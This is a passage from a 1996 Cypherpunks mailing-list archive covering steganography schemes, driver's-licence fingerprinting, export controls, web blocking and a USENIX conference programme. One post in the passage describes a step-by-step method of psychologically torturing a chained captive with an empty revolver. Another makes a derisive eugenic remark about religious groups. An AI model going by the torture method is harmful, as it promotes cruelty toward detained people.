adopting new > anti-money laundering rules earlier this year. And Treasury Secretary > Robert Rubin convened a conference of 29 nations in December 1995 to > focus on the money laundering problem. > > One committee member, Rep. Maxine Waters, D-Calif., addressed the > political context of the hearings. > > Waters said she was suspicious that the Republican-led Congress was > holding ''a rash of hearings this month ... on the subject of drugs just > as Presidential candidate Dole tries to use the issue as part of his > campaign strategy against President Clinton.'' > > Waters said if the GOP-led House ''is truly serious about the impact of > drugs'' it should hold hearings about charges raised in a San Jose > Mercury News investigative series last month concerning the role > CIA-backed rebels in Nicaragua played in bringing crack cocaine and > weapons to Los Angeles and other cities. > > Bachus told Waters the hearing wasn't motivated by politics and that he > had personally been involved in anti-drug efforts prior to his election > to Congress. > > --- > > Dr.Dimitri Vulis KOTM Fuckhead. From steve at edmweb.com Thu Sep 19 02:50:33 1996 From: steve at edmweb.com (Steve Reid) Date: Thu, 19 Sep 1996 17:50:33 +0800 Subject: really undetectable crypto made somewhat practical In-Reply-To: <199609190126.VAA01522@beast.brainlink.com> Message-ID: I'm on FCPUNX instead of regular Cypherpunks, so please excuse me if I'm a little behind the thread. > New Scheme: First, calculate the MD5 hash of all the words in the various > dictionary files used by the password cracker program and create a > database containing every word and the first 4 bits of its MD5 hash. > Given such a database, it would be possible to write a program that > accepts as input a block of cyphertext (the stego message, encrypted), > chunks it up in to groups of 4 bits and then, for each chunk, displays the > words that have hashes that start with those same four bits. The person > running the program would select words that form meaningful sentences but > also produce hashes that combine into the encrypted stego message. This > scheme would send 4 stego bits per word. As a slight improvement, you could turn this into a complete stealth encryption scheme, using only the one-way hash function operating as a MAC. Instead of hashing just the word in an effort to get stego bits, you could hash a key along with the word. In order to get the intended hash you would need to know the key. Since you're probably hashing a whole block of 512 bits (or whatever's specified in the algorithm) appending a key should not affect the speed of the system. I'm certain that this would increase the security, possibly enough that you wouldn't need to use a regular encryption algorithm (but I wouldn't bet on it). Crude example: Assume that Alice can use the words "Greetings" and "Salutations" interchangably without drawing suspicion. Also assume that "PASSWD" is a secret known only to Alice and Bob, and that the stego software looks at the low bit of an MD5 hash. MD5 ("GreetingsPASSWD") = c7bf6e051731a0dcf52baa330c9d2e7d <- low bit=1 MD5 ("SalutationsPASSWD") = 2dd2ba080b5feb060ffbc6d196fd1b34 <- low bit=0 If you say "Greetings" you're sending a 1, if you say "Salutations" you're sending a 0. Eve doesn't know about "PASSWD" so she can't do the hash and figure the bit. Of course, if you're using this to send more bits, you'll need something harder to guess than "PASSWD". The trick is in figuring out which words have stego bits and which don't. It might be better to stego bits into a whole line instead of a word, as that would probably offer more flexibility. ===================================================================== | Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/) | | Email: steve at edmweb.com Home Page: http://www.edmweb.com/steve/ | | PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 | | -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. -- | ===================================================================:) From batman at infomaniak.ch Thu Sep 19 03:00:35 1996 From: batman at infomaniak.ch (Batman) Date: Thu, 19 Sep 1996 18:00:35 +0800 Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building Message-ID: <01BBA60C.5AD5CCC0@misd145.cern.ch> For the 200th time, unsubscrive me of your fucked mail lists. From dougr at skypoint-gw.globelle.com Thu Sep 19 03:12:36 1996 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Thu, 19 Sep 1996 18:12:36 +0800 Subject: Counter "noise" with "signal" (please?) Message-ID: If a S/N ratio becomes irritating, by all means, don't increase the denominator! In other words, do your part to let undeserving threads die. Certain things can only be dignified with a response, but I imagine that goes without saying. -Doug Renner From dougr at skypoint-gw.globelle.com Thu Sep 19 03:24:20 1996 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Thu, 19 Sep 1996 18:24:20 +0800 Subject: Morality, Responsibility, Technology. Message-ID: Some previous thread mentioned the potential usefulness of a large database containing private medical information, and possibly genetic detail as well. While I agree on the tremendous constructive potential of such a hypothetical data-mine, I seriously doubt that Mankind has the moral integrity to use this type of knowledge responsibly. Supposing for example, a particular genetic "defect" were found with such a database to have a 90% correlation with the presence of epilepsy. Immediately, doctors & scientists would strive to find a way to gain some leverage against this "defect." We might for example see a testing procedure for human fetuses to determine whether a particular pregnancy "should be" terminated. People would become famous, and much money would change hands due to this "discovery." Generally people will conclude that Science has given them more control over their lives than they previously had. The problem is, nobody really understands just what this "defect" really means. Nobody understands why it is there, or what kind of a choice we are really making my attempting to remove it from our gene pool. Remember that Sickle Cell Anemia is caused by a genetic "defect". We are lucky enough to know that the carriers of this "defect" are uniquely able to survive certain plagues. This so-called "defect", as troublesome as it may be to some individuals, is really a latent strength, which is how natural selection reinforced it in the first place, and we may need it again. The term "defect" is therefore entirely out of line. We have no business placing judgements from our own limited material value sets onto something which has the definite potential of affecting all future generations of Humanity. It's none of our business. Further, when such a database is eventually created, I ask not "who" but "what" will have access to it? What kind of non-sentient group mentality will have sufficient authority and be presumptuous enough to declare itself morally objective? What kind of a larger process might such an entity be unwittingly serving? We already have many times more material knowledge than we are morally capable of handling as a species. Here's one tiny example. The most widespread use of the knowledge of psychology is guess what? Advertising and Marketing. Our average American sits entranced watching hours of television daily, unwittingly absorbing countless impressions by advertisers with more money than morality. Can he identify the "glittering generalities" or the "bandwagon appeals" or any of the other effective forms of propaganda? Does he know the truth from a lie when sexual titillation is part of the presentation? May he readily accept what is presented, and most of all: Does he see himself sitting there, absorbing these impressions? We don't see our selves in action. We can't know what we're doing. None of us have developed sufficient "presence" to know what we are really doing most of the time. We can't possibly be objective, except in extremely rare, life-changing moments, and even then only if we're lucky. Just thinking about yourself thinking isn't enough, because where are your emotions? Do you really understand why your thoughts are what they are? Did *YOU* put those thoughts in your head intentionally, or did they sort of happen on their own... one thought following another through some combination of association and external stimuli? And while you've been busy reading this, with your attention directed outward, why haven't you been aware of the sensation in your feet, or the tension in your face, or your posture, or your breath? As westerners we have directed so much of our attention "outward" that we develop little or no objective knowledge of what goes on within us. Can we break this cycle? If there really are esoteric schools, with disciplines and methodologies of obtaining self-knowledge, then this knowledge must be such that by its very nature, it cannot possibly be communicated successfully in any large, public manner. But I digress. As a reader of this list, have you ever asked yourself Why, why is it that you personally want strong encryption to be widely available? It's a very powerful emerging technology, and it's in the palm of your hands. Douglas B. Renner dougr at usa.globelle.com From stewarts at ix.netcom.com Thu Sep 19 04:50:57 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 19 Sep 1996 19:50:57 +0800 Subject: 56 kbps modems Message-ID: <199609190849.BAA01822@dfw-ix11.ix.netcom.com> At 10:41 AM 9/17/96 -0700, Eric Murray wrote: >Crypto/security related: how hard is it to hack a Frame Relay >connection? My impression is that it requires access to >one of the telco's routing computers, which would make it >about equivalent in difficulty to hacking POTS. Frame Relay doesn't get handled by the telco's POTS routing (unlike ISDN) - it's handled by whatever frame relay switch the telco uses. I don't know what Pac Bell uses; AT&T uses Stratacom switches, I think MCI uses Cascade, USWest uses a mixture. Frame switches mostly use Permanent Virtual Circuits, though Switched Virtual Circuits will be coming out in the next year or so. PVCs are pretty tough to hack, because they mostly get provisioned from an administrative interface on the switch rather than in-band. SVCs will offer a bit more risk, since switching is switching. But it's probably pretty tough. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From rp at rpini.com Thu Sep 19 05:10:58 1996 From: rp at rpini.com (Remo Pini) Date: Thu, 19 Sep 1996 20:10:58 +0800 Subject: Cryptologie: Conference internationale - 25 SEPT - Paris Message-ID: <9609190933.AA24701@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: quoted-printable To: cypherpunks at toad.com Date: Thu Sep 19 11:31:08 1996 > September 25, 1996 > > Centre de Conf=E9rence Internationale > 19 Avenue Kleber, Paris 16, France > > Program, registration and further information (English): > http://www.epic.org/events/crypto_paris > I'll be there, how about any of you out there (yes, I know some of you wi= ll be there as a feature)? - ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBMkES3RFhy5sz+bTpAQEzmAf/d1XqnIlGj3jgX/hgGLwom15WLsNvPjfZ YcQqOjP3e5pEeHjWWAUUjQ2dopTOI7+Kytb4ZCIgoI6TIFmkWj/jAMfpx/IYx89C Db3f7+jvEN19Q/NQUYdUXktqaMC7zFMjgX8U2LBfiuR7qloMMJV+O3pDTvdJCjln BumjKnk9NwebtBrcmMIw3Y1LZ1jjFfwbanUEYlKMUgp32XXxxe+q0HOWI4x9gb32 NvPlXSftPSkpHt2M8V52wZljbtnd9WfDTsqscEjaZ3e++IousAc2itkFSV3jvS72 XT2ZZrU3lJc0n8qOjKyYR19hMIfzQgzwmrbukK0/W8R923SSA01nGA== =ERW9 -----END PGP SIGNATURE----- From bryce at digicash.com Thu Sep 19 05:11:00 1996 From: bryce at digicash.com (bryce at digicash.com) Date: Thu, 19 Sep 1996 20:11:00 +0800 Subject: an author rating was: Re: Cypherpunk Enquirer [NOISE] In-Reply-To: <199609190441.AAA12078@dhp.com> Message-ID: <199609190939.LAA00616@digicash.com> -----BEGIN PGP SIGNED MESSAGE----- Authors: Bryce 9 Enquirer 9 Black Unicorn 7 Duncan Frissell 7 Robert A. Hettinga 7 Lucky Green 7 Sandy Sandfort 7 Hal 7 Perry E. Metzger 7 Tim May 7 John Young 5 llurch 5 Rick Smith 5 Jim Bell 0 Vulis 0 Subjects: DigiCash 9 Ecash 9 Chaum 8 nym 7 Java 5 trust 5 government 0 policy 0 escrow 0 GAK 0 terror 0 freeh 0 clinton 0 whitehouse 0 white house 0 FBI 0 NSA 0 export 0 munition 0 -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2 iQB1AwUBMkEUzUjbHy8sKZitAQGw1gMA05giwvl28mmxBpBFmIwDf1DvPAzjPHC6 jh3oZ8zAFYE1WByDKl1/N9InCDTosr6SEfWsuwvLbt04r5WMd6Ay3grXRaABN2dk ocrccaOyBDdWFk7XdR8HqqaJkMeF5LkV =78PT -----END PGP SIGNATURE----- From mikev at is.co.za Thu Sep 19 07:52:56 1996 From: mikev at is.co.za (Mike van der Merwe) Date: Thu, 19 Sep 1996 22:52:56 +0800 Subject: CIA hacked Message-ID: Hi everybody Heh! This one's good for a laugh :-)) http://www.odci.gov/cia Seems the DOJ hack was a good inspiration. Heh! Life's good when you're willing to work at it. Later Mike ____________________________________________________________________ I'm sure we will find out in a few years that Microsoft invented the Net. Or brought it to the masses. Or saved it from a certain and early demise. Or all of the above. JAMES SEYMOUR From stewarts at ix.netcom.com Thu Sep 19 08:18:15 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 19 Sep 1996 23:18:15 +0800 Subject: GAK, GAP, GAY Message-ID: <199609190849.BAA01837@dfw-ix11.ix.netcom.com> At 10:52 AM 9/18/96 -0700, Tim wrote: >It doesn't matter if cash is still allowed if one cannot interact with any >health care person without a proper citizen-unit data base entry. They've >got you tracked even if you pay in gold dust. > >(Putting on my Duncan cap--not to be confused with dunce cap--I wonder what >will happen the first time someone dies because a hospital wouldn't treat >someone without a proper citizen-unit health care card?) By definition, without a citizen-unit health card number, a Health Status Transition Event can't be recorded, therefore nothing will happen. It's possible that some auditor may notice a short-term increase in the amount of hazardous medical waste disposal at the facility that can't be properly allocated to health-services-consumption-units for cost recovery purposes, but there are overhead accounts for such things, which are simpler than creating fictitious accounts for "un-persons" or some such. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From jk at stallion.ee Thu Sep 19 08:46:32 1996 From: jk at stallion.ee (=?ISO-8859-1?Q?J=FCri_Kaljundi?=) Date: Thu, 19 Sep 1996 23:46:32 +0800 Subject: Mercenaries In-Reply-To: Message-ID: Wed, 18 Sep 1996, Timothy C. May wrote: > As to Michelle's point that Americans cannot serve for pay in other > militaries, there are all sorts of waivers and "look the other way"s > involved. For example, the retired American officer who became the top > military man in Estonia (or one of the Baltic States)--while still > retaining his U.S. citizenship. General Aleksander Einseln had some problems with US authorities because of working as the head of Estonian Army, I am not sure if he lost his US pension or not, at least that was what the US promised to do. He is having problems in Estonia right now BTW, some days ago the security police took him to interrogate him in the defense forces headquarters weapons smuggling case. That happened some days after he announced his consent to stand as the candidate for President of Estonia. This kind of bad attention did not allow him to set up his candidacy. No relevance to CP, I know :) J�ri Kaljundi AS Stallion jk at stallion.ee From jeffb at issl.atl.hp.com Thu Sep 19 09:34:31 1996 From: jeffb at issl.atl.hp.com (Jeff Barber) Date: Fri, 20 Sep 1996 00:34:31 +0800 Subject: DL in exchange for fingerprint Message-ID: <199609191223.IAA13606@jafar.issl.atl.hp.com> Oh joy. You no longer need to be arrested to get fingerprinted in Georgia. On the front page of Wednesday's Atlanta Journal, under the headline "Now you can get driver's license in minutes": The average 45-day wait to get a new driver's license in Georgia will be a thing of the past under a new system that will churn them out while customers wait. "From start to finish it takes about 10 minutes," said chief examiner ... in charge of the Georgia State Patrol's driver's license office in Milledgeville where the system went into effect on Tuesday. Previously, drivers received a temporary paper license that was good for 45 days. ... ... Officials at the Department of Public Safety plan to have the new computer system in 82 locations across the state by Oct. 1. Georgia is the 32nd state with the system. After an eye exam, the applicant presses a finger down on a pad that registers the fingerprint in a state-wide memory bank. Then, the examiner confirms the name, address, and identifying information. ... The licenses have a hologram of the word "Georgia" behind the driver's name, age and address, and a bar code on the back that contains a laser recording of the driver's index fingerprints. "We keep a memory bank that matches your fingerprints with your license," [DoPS spokesman] said. "In other words, if you went to get a new license with a false birth certificate and your fingerprint didn't match the name, you wouldn't get a license. And you could also face possible investigation for fraud from the Public Safety's investigative division." ... "I think it's wonderful," said Katherine Kidd, the first Milledgeville driver to get the instant license. "It's a great idea. Now we don't have to wait forever." [ End quote ] Just what I would have called it: a great idea. Is it true that 31 other states take your fingerprint as part of the license application? I feel sick. -- Jeff From jya at pipeline.com Thu Sep 19 09:36:40 1996 From: jya at pipeline.com (John Young) Date: Fri, 20 Sep 1996 00:36:40 +0800 Subject: SAB_tag Message-ID: <199609191243.MAA17222@pipe1.ny2.usa.pipeline.com> 9-19-96. NYP: "New Method of Internet Sabotage Is Spreading." Markoff. Sabotage reported by Panix is spreading and has now occurred at least a dozen other World Wide Web sites around the nation. Officials concede that there is no easy defense against the attack. One said. "I think this is sick, but I guess that is what these guys do." "Regulators Turn Spotlight on Cybermoney." As concerns grow about electronic money laundering, cybercounterfeiting and bank runs on the Internet, regulators around the world are scurrying to catch up with the rapid development of electronic money. The US plans to announce today two initiatives intended to grapple with the new technology, and in another move, G-7 will examine the international cooperation needed as money moves through the borderless world of the Internet. ----- http://jya.com/sabtag.txt (14 kb for 2) SAB_tag ---------- Pipeline is sluggish due to transition to Mindspring operation. Responses may be slow or never. Try again after 2000, or forget about it, go Luddite. From weber at iez.com Thu Sep 19 10:11:58 1996 From: weber at iez.com (Rolf Weber) Date: Fri, 20 Sep 1996 01:11:58 +0800 Subject: GLOBAL ALERT: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES In-Reply-To: <199609181645.SAA29420@xs1.xs4all.nl> Message-ID: <9609191310.AA11909@spibm02> i absolutely agree with what you said, but let me correct this misunderstanding: > > GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES. > it was *not* the german government, it was the public prosecutor general, who pushed this blockage. the german government recently said, that ISPs shouldn't (and aren't!) be responsible for what they're transmitting. but like other democratic states, in germany the public prosecutor is independant from government... rolf -- ----------------------------------------- Rolf Weber | All I ask is a chance IEZ AG D-64625 Bensheim | to prove that money ++49-6251-1309-109 | can't make me happy. From hootie at netrix.net Thu Sep 19 10:12:07 1996 From: hootie at netrix.net (hootie at netrix.net) Date: Fri, 20 Sep 1996 01:12:07 +0800 Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building Message-ID: <9609191315.AA19307@netrix.net> Me too! At 09:24 AM 9/19/96 +-200, Batman wrote: >For the 200th time, unsubscrive me of your fucked mail lists. > > > From mixmaster at remail.obscura.com Thu Sep 19 10:21:47 1996 From: mixmaster at remail.obscura.com (Mixmaster) Date: Fri, 20 Sep 1996 01:21:47 +0800 Subject: No Subject Message-ID: <199609191230.FAA09141@sirius.infonex.com> "Drivers Must Allow Fingerprinting" By Ralph Ellis _The Atlanta Constitution_ 9/19/96 "Georgians renewing or getting a new driver's license after Sept. 30 will have to provide the state with two fingerprints. "The right and left index fingerprints will be taken with an inkless scanning device that is part of a digital imaging system being installed in 82 driver's license examination offices across the state said Gordy Wright, spokesman for the Georgia Department of Public Safety. SNIP "The fingerprints will make it difficult for people to obtain licenses with falsified identification papers, Wright said. "Teresa Nelson of the Ga. Civil Liberties Union said the fingerprinting invades the privacy of law-abiding citizens. "'I have grave concerns,' she said. 'When we think of giving a fingerprint, we think of being arrested. We feel like we've done something wrong, not because we are complying with the law and are doing something right.' "There will be no exceptions to the fingerprint requirement..., Wright said, adding that 'having a driver's license is a privilege,' not a right. SNIP "Wright said...the fingerprints eventually will be available to other law enforcement agencies and courts.... SNIP "The new licenses will include an instant photo....A bar code on the back will contain a laser recording of the driver's index fingerprints...." From proff at suburbia.net Thu Sep 19 10:25:51 1996 From: proff at suburbia.net (Julian Assange) Date: Fri, 20 Sep 1996 01:25:51 +0800 Subject: Morality, Responsibility, Technology. In-Reply-To: Message-ID: <199609191327.XAA00418@suburbia.net> > The term "defect" is therefore entirely out of line. We have no business > placing judgements from our own limited material value sets onto > something which has the definite potential of affecting all future > generations of Humanity. It's none of our business. The problem however, is that artificial selection maybe the only way to select beneficial attributes at all. What is presently being selected for in western societies is all the factors that lead to a lack of practice or belief in birth control. I'll let the reader think for a moment on just what those are. Perhaps we can also somehow test for and abolish the "Catholic" gene? -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From Mullen.Patrick at mail.ndhm.gtegsc.com Thu Sep 19 10:29:59 1996 From: Mullen.Patrick at mail.ndhm.gtegsc.com (Mullen Patrick) Date: Fri, 20 Sep 1996 01:29:59 +0800 Subject: Stego inside encryption Message-ID: I know a lot of times the idea behind steganography is to hide the fact that a secret message is in a seemingly normal file/mail/whatever. This is good for avoiding unwanted interest in your file. The benefit of not having people attempt to crack you code, added to the strength of the cryptosystem is wonderful. However, I propose this-- Don't hide that anything's encrypted! Rather than hide this fact, throw it in their face! I propose hiding an encrypted message inside another encrypted message. Set bits in specific places to data in the real message. The benefit is Oscar not only doesn't know what the crypto is, he attacks the wrong message. Hiding statistically random bits from the true message in statistically random bits from the masking message shouldn't be too hard. Granted, this scheme doesn't get you past measures designed to keep out all encrypted messages, and it surely wouldn't keep you message from generating interest, but it would be very hard to decrypt the message, especially when some algorithm is used which (seemingly) randomly selects which bits to use for the stego. Just a thought... My apologies if someone has already proposed this method. Patrick From dthorn at gte.net Thu Sep 19 11:27:27 1996 From: dthorn at gte.net (Dale Thorn) Date: Fri, 20 Sep 1996 02:27:27 +0800 Subject: Mike Farrell, actor In-Reply-To: <199609190531.XAA10513@InfoWest.COM> Message-ID: <3241542F.4E70@gte.net> attila wrote: > Mike Farrell, actor and longtime opponent of the death penalty: > "We don't rape rapists, > we don't burn arsonists, > why should we kill killers?" > well, come to thing of it, why don't we let a bull rape a rapist? > or burn an arsonist at the stake? > seems fair to me. maybe even sell tickets to pay for the cost. This must be just the entertainment angle. Something about ancient Roman orgies comes to mind. More to the point, if you can't figure out how to reform the offender (impossible in current prisons), and you can't get the offender to compensate the victim(s), you could at least tap into the perp's subconscious a little way and apply some inhibitors. One technique that works on a lot of violence-prone individuals: Chain the bad guy to a secure post in a dark basement somewhere, and leave them for 24 hours. On returning, flip on the light, give them a few seconds to be able to at least see your outline pretty well, then put an empty revolver next to their head and fire. Now turn off the light and leave. Repeat until subject is jelly, basically. Variations include various background noises with timing controller, etc. From Mullen.Patrick at mail.ndhm.gtegsc.com Thu Sep 19 11:32:59 1996 From: Mullen.Patrick at mail.ndhm.gtegsc.com (Mullen Patrick) Date: Fri, 20 Sep 1996 02:32:59 +0800 Subject: Stego inside encryption Message-ID: To take this one step further, has anyone tried to ever use this method as an encryption method? You could hide data in a stream of random bits, using position as the encryption method. Obviously, the data would not be stored in packets; rather as single bits strewn throughout the stream. Even ASCII characters could be hidden in such a system very well, as the possibility of choosing the correct 8 bits (extended char set) from the data stream when any combination has equal potential of being the correct sequence would be extremely difficult. Error checking/correcting code could even be used. Using this system, the placement algorithm would be the focus of attack. If an algorithm which has a sufficiently random placement was used, extracting the correct bits would be difficult. Another way to increase the security would be to hide the correct message inside a bitstream created by using the same method on other similar messages. (Hiding a real message inside bogus messages. Hmm... Which one's real?) Patrick _______________________________________________________________________________ From: Mullen Patrick on Thu, Sep 19, 1996 9:19 Subject: Stego inside encryption To: Cypherpunks I know a lot of times the idea behind steganography is to hide the fact that a secret message is in a seemingly normal file/mail/whatever. This is good for avoiding unwanted interest in your file. The benefit of not having people attempt to crack you code, added to the strength of the cryptosystem is wonderful. However, I propose this-- Don't hide that anything's encrypted! Rather than hide this fact, throw it in their face! I propose hiding an encrypted message inside another encrypted message. Set bits in specific places to data in the real message. The benefit is Oscar not only doesn't know what the crypto is, he attacks the wrong message. Hiding statistically random bits from the true message in statistically random bits from the masking message shouldn't be too hard. Granted, this scheme doesn't get you past measures designed to keep out all encrypted messages, and it surely wouldn't keep you message from generating interest, but it would be very hard to decrypt the message, especially when some algorithm is used which (seemingly) randomly selects which bits to use for the stego. Just a thought... My apologies if someone has already proposed this method. Patrick From adam at homeport.org Thu Sep 19 11:37:07 1996 From: adam at homeport.org (Adam Shostack) Date: Fri, 20 Sep 1996 02:37:07 +0800 Subject: Systems/Communications Security Positions in the South Bay In-Reply-To: Message-ID: <199609191522.KAA05519@homeport.org> Add a (work available) tag to your subject, and we'll all be fine with it. What good's a revolution if you can't get rich? :) Adam Steve Dyson wrote: | I know someone is going to get PO'd about this, but I didn't know how else | to get these in front of you in a timely manner. These positions are | critical and interesting parties can interview next week, please read on: -- "It is seldom that liberty of any kind is lost all at once." -Hume From matt at lust.bio.uts.edu.au Thu Sep 19 11:40:52 1996 From: matt at lust.bio.uts.edu.au (Matthew Gream) Date: Fri, 20 Sep 1996 02:40:52 +0800 Subject: Australian "ITAR" regulations In-Reply-To: <199609190543.WAA01040@toad.com> Message-ID: <199609191504.BAA11734@lust.bio.uts.edu.au> Hi Sherry, > Some time ago I had various email exchanges regarding Australian crypto > export regulations. More recently I've been put in the picture by David > Cox and others that there are in fact ITAR-like laws in force in Australia. > The last time I looked into this, Matt Crean(?) had very little luck finding > any info from the various relevant departments, have of whom didn't seem > to have a clue. Yes I did in fact investigate this area back in 1994. I managed to obtain sufficient information to indicate that there were ITAR like controls in place. My liasons with departments did result in some vague answers though, but the legislation was clear. You can find details about my findings at: http://www.next.com.au/spyfood/geekgirl/001stick/crypto/aust/index.html I've not revisited the area since that time, so there may have been recent developments. As you have mentioned, there are indeed controls. The regulations enforce these through two mechanisms; the first being explict coverage in the Prohibited Exports Regulations, and the second through COCOM related DUT controls via. documentation referenced in said regulations. This latter area may have been revised with recent COCOM activity. At the time, and I suspect still at this point in time, there seems to be little awareness that these controls are in place. Cheers, Matthew. -- Matthew Gream -- matt at lust.bio.uts.edu.au. From mab at crypto.com Thu Sep 19 11:46:35 1996 From: mab at crypto.com (Matt Blaze) Date: Fri, 20 Sep 1996 02:46:35 +0800 Subject: 1997 USENIX Technical Conference info Message-ID: <199609191319.JAA12275@crypto.com> USENIX 1997 ANNUAL TECHNICAL CONFERENCE January 6-10, 1997, Anaheim, California Co-Located with: USELINUX: Linux Applications Development & Deployment Conference Co-Sponsored by Linux International and the USENIX Association PROGRAM AT A GLANCE AND IMPORTANT DATES TO REMEMBER ===================================================== Early Registration Savings Deadline: November 22, 1996 Hotel Discount Deadline: December 20, 1996 ===================================================== SUNDAY, JANUARY 5 Registration 4:00pm - 9:00pm Kickoff Reception 6:00pm - 9:00pm MONDAY, JANUARY 6 Registration 7:30am - 5:00pm Tutorials 9:00am - 5:00pm TUESDAY, JANUARY 7 Registration 7:30am - 5:00pm Tutorials 9:00am - 5:00pm Birds-of-a-Feather Sessions 6:00pm - 10:00pm WEDNESDAY, JANUARY 8 Registration 7:30am - 6:00pm Keynote Address 9:00am - 10:30am Technical Sessions 11:00am - 5:00pm USELINUX Developers 9:00am - 5:30pm Vendor Display 12:00am - 7:00pm USELINUX Case Studies 7:30pm - 11:00pm Birds-of-a-Feather Sessions 7:30pm - 11:00pm THURSDAY, JANUARY 9 Registration 7:30am - 6:00pm Technical Sessions 9:00am - 6:00pm USELINUX Developers 9:00am - 5:30pm Vendor Display 10:00am - 4:00pm Birds-of-a-Feather Sessions 6:00pm - 10:00pm USELINUX Case Studies 6:00pm - 10:00pm FRIDAY, JANUARY 10 Technical Sessions 9:00am - 5:45pm USELINUX Business 9:00am - 4:00pm NEW AT ANAHEIM: =============== USELINUX, the Linux Applications Development and Deployment Conference, co-sponsored by Linux International and USENIX. If you are: An application developer porting or developing Linux applications, a system admininistrator having to maintain Linux systems, a business person who wishes to develop a Linux business, plan to attend USELINUX. One fee covers the registration for both conference programs, and you can go freely back and forth between them. (Tutorials carry a separate fee for both USENIX and USELINUX). ================================= TUTORIAL PROGRAM Monday-Tuesday, January 6-7, 1997 ================================= Register now to guarantee your first choice - seating is limited. Tutorial fees include printed and bound tutorial materials from your sessions, lunch, CD-ROM with Tutorials, Referreed Papers, and Invited Talks, Admission to the Vendor Exhibits TUTORIAL OVERVIEW Monday, January 6 ================= M1: Beginning Perl Programming for UNIX Programmers (Updated for Perl 5) M2: The Kerberos Approach to Network Security (Updated). M3: An Introduction to Java M4: Secure Java Programming M5: Windows NT and Windows 95 - The Win32 API M6: UNIX Network Programming M7: Selected Topics in System Administration (New) M8: How Networks Work - The Limits of Modern Internetworking (Updated) M9: System and Network Performance Tuning (New) M10: Inside the Linux 2.0 Kernel (New) Tuesday, January 7 ================= T1: UNIX Security Tools: Use and Comparison. T2: CGI and WWW Programming in Perl (New) T3: Security on the World Wide Web (New) T4: Creating Effective User Interfaces (New) T5: Java Applets and the AWT (New) T6: Setting Up And Administering A Web Server (New) T7: Security for Software Developers: How to Write Code that Withstands Hostile Environments (New) T8: Solaris System Administration (New) T9: IP version 6: An Introduction T10: Writing Device Drivers Under Linux (New) COMPLETE TUTORIAL DISCRIPTIONS Are available on our Website, http://www.usenix.org ==================================== TECHNICAL PROGRAM Wednesday-Friday, January 8-10, 1997 ==================================== TECHNICAL SESSIONS WEDNESDAY, JANUARY 8 9:00-10:30 Opening Remarks: John Kohl, Pure Atria Corporation Keynote Address: Developing on "Internet Time" James Gosling, Sun Microsystems REFEREED PAPERS 11:00-12:30: PERFORMANCE I Embedded Inodes and Explicit Grouping: Exploiting Disk Bandwidth for Small Files Gregory R. Ganger and M. Frans Kaashoek, Massachusetts Institute of Technology Observing the Effects of Multi-Zone Disks Rodney Van Meter, Information Sciences Institute, University of Southern California A Revisitation of Kernel Synchronization Schemes Christopher Small and Stephen Manley, Harvard University 2:00-3:30: INTERFACE TRICKS Porting UNIX to Windows NT David G. Korn, AT&T Research Protected Shared Libraries - A New Approach to Modularity and Sharing Arindam Banerji, John M. Tracey, and David L. Cohn, University of Notre Dame A Novel Way of Extending the Operating System at the User-Level: the Ufo Global File System Albert D. Alexandrov, Maximilian Ibel, Klaus E. Schauser, and Chris J. Scheiman, University of California, Santa Barbara 4:00-5:00: CLIENT TRICKS Network-aware Mobile Programs Mudumbai Ranganathan, Anurag Acharya, Shamik Sharma, and Joel Saltz, University of Maryland Using Smart Clients to Build Scalable Services Chad Yoshikawa, Brent Chun, Paul Eastham, Amin Vahdat, Thomas Anderson, and David Culler, University of California, Berkeley THURSDAY, JANUARY 9 9:00-10:30: CLUSTERING Building Distributed Process Management on an Object-Oriented Framework Ken Shirriff, Sun Microsystems Laboratories Adaptive and Reliable Parallel Computing on Networks of Workstations Robert D. Blumofe, University of Texas, Austin and Philip A. Lisiecki, Massachusetts Institute of Technology A Distributed Shared Memory Facility for FreeBSD Pedro A. Souto and Eugene W. Stark, State University of New York, Stony Brook 11:00-12:30: TOOLS Libcdt: A General and Efficient Container Data Type Library Kiem-Phong Vo, AT&T Research A Simple and Extensible Graphical Debugger David R. Hanson and Jeffrey L. Korn, Princeton University Cget, Cput, and Stage Safe File Transport Tools for the Internet Bill Cheswick, Bell Laboratories 2:00-3:30: WORKS IN PROGRESS FRIDAY, JANUARY 10 9:00-10:30: USER SOMETHING WebGlimpse - Combining browsing and searching Udi Manber, Michael Smith, and Burra Gopal, University of Arizona Mailing List Archive Tools Sam Leffler and Melange Tortuba, Silicon Graphics Experience with GroupLens: Making Usenet Useful Again Bradley N. Miller, John T. Riedl, and Joseph A. Konstan, University of Minnesota 11:00-12:30: PERFORMANCE II Overcoming Workstation Scheduling Problems in a 